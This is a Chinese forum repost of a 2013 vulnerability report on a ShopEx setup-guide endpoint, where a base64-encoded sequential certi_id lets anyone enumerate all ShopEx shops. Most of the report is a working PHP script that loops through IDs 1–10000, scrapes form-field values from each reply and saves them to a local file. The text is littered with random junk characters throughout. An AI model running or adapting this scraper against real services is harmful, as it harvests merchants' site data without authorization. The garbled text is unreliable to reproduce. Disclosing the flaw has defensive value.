|
|
简要描述: ?/ v7 [ w! K4 U
ShopEx某接口缺陷,可遍历所有网站
Q6 w$ ~3 w" t' }1 o' G- e! p- Y详细说明:$ @+ l# A Y# f, i1 c5 [. U
问题出现在shopex 网店使用向导页面 3 r4 Y p: i" m2 ^3 Z# c
- L$ N5 A! D+ Y. L6 f8 H' T6 V
. Q( h9 O, p. ~ r; r; }/ v( n6 j. c+ K7 c
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=9 ~9 Y8 M( t! b% h+ `. N
r7 ^' W3 t, n( @; C
; h; _) H$ ]/ K) ?" |
# F; Y# z. o+ T" \* @
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
, q" Q- c9 ~- `1 a- W' e5 P
' c5 t% u4 h4 @+ A7 @! [+ j& {: L$ K$ c+ I3 X
1 W$ z9 ?/ b4 N) K' t* p
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
! W& j8 `( H4 N9 k5 _
, n) }% ^; {1 `! W4 E( ]7 `" t8 J$ t' P; {# s2 ~' P4 D) `, L6 x
0 w6 s1 r5 |5 u$ E) \/ n% _7 [
<?php) X; C" v# N* v: q& T) C- F
4 w" f# i {( A' C% u. K
for ($i=1; $i < 10000; $i++) { //遍历
. I, u" _- R! P& T/ _+ e1 t" f) o8 o: e& t* n
ShowshopExD($i);% I @# { q. h1 v/ F
* D" m5 b1 d) q4 N& c
}$ u* Q! d* K: g2 g
8 c) `2 A; @6 G. N( | function ShowshopExD($cid) { E7 b' H- y5 E3 C% ` t! K
) V6 a4 d) x$ {. p t5 N0 u1 b5 X
$url='http://guide.ecos.shopex.cn/step2.php';
( v! Q8 n( p: ^9 p. d( j
0 a/ ?6 T# Q' o6 t5 _ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: q8 ]: p- _1 t! C! w' F
: [1 H6 ]* F5 s $url = $url.'?refer='.$refer;2 Z5 ] L! B2 ]4 ]7 Q: |/ T, a- L& k
) b6 _1 K) o6 p- U! q2 m) `
$ch = curl_init($url);. k! Q- t! I% e
) j2 v/ h) s8 P! z curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
3 R* `' W5 U' Y: S3 `% Q7 R
8 I: t$ Z2 j( t2 z$ Y curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 w+ Z7 G% ?: i5 S* y, a+ E# T/ x0 P
$result = curl_exec($ch);4 r! K' H$ L0 T5 L0 i+ b
1 t7 V$ P1 L0 ~3 M
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
) b. o. u; Z( ~7 q0 a; X T2 N ?$ D# ^1 H
if(strpos($result,$refer)). w' A& u/ F/ l r
! Z+ {& @% e, [ X6 ]% @2 t, Q
{
, L( i; }! u5 X, w2 B: e& ~0 s& G q& q; i, u$ {6 m% w$ p
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
; k1 {, j9 h; q' d
5 \7 b8 [1 @; R; M4 z preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);8 V9 R) y* r7 `- l
, f/ g) p2 }( k' u9 k- S/ D
foreach ($value[1] as $key) {8 ?8 E) p8 h7 W6 A3 Z- r
' D- j# K* z) m$ K' ]* U preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 ~" }0 ?" r7 f# y
o$ g+ Q5 ^7 R9 i, O L echo $res[1][0].':'.$res[3][0]."\r\n";; q. f6 c' {! y0 t
% Z4 f, D" |' p/ M" L( ~ $col =$res[1][0].':'.$res[3][0]."\r\n";
5 G% j. `5 O3 c5 P! D. f' q( ]; [4 a: }2 j& p4 I
fwrite($fp, $col, strlen($col));
5 T/ V, h+ ~! F% y4 T; R
% w' h) |. l3 u! `% P' v. u }
~ `7 q: S3 l2 x( `& G) i- D; z- N% t4 h9 d
echo '--------------------------------'."\r\n";
9 U, j8 f/ b+ ~- g) ^$ I6 E0 a2 n9 Q* \% x1 R
fclose($fp);
k( x8 S- y9 Q) ~" E3 p3 k: x1 n" C& J6 g
}
+ I, O* n9 w: v! B
: w1 w( S& |/ e- T+ y% D" L flush();
5 \+ x( @1 y v) @$ c5 P* R$ b `6 u8 V; ?6 |2 M
curl_close($ch);
/ t5 i5 q# g' V: ~) W6 C
/ f/ O" S) M, ?. ^$ g4 J }
6 _: b9 s/ a7 D7 g
! |* g0 @$ S, c?>
: u. J1 D5 @) h+ P; n2 A- |漏洞证明:
. h/ }& C( U! S" Ahttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg* I; ]! t; y1 A2 l
refer换成其他加密方式
- n! ^0 T8 I2 u C! d9 Z |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对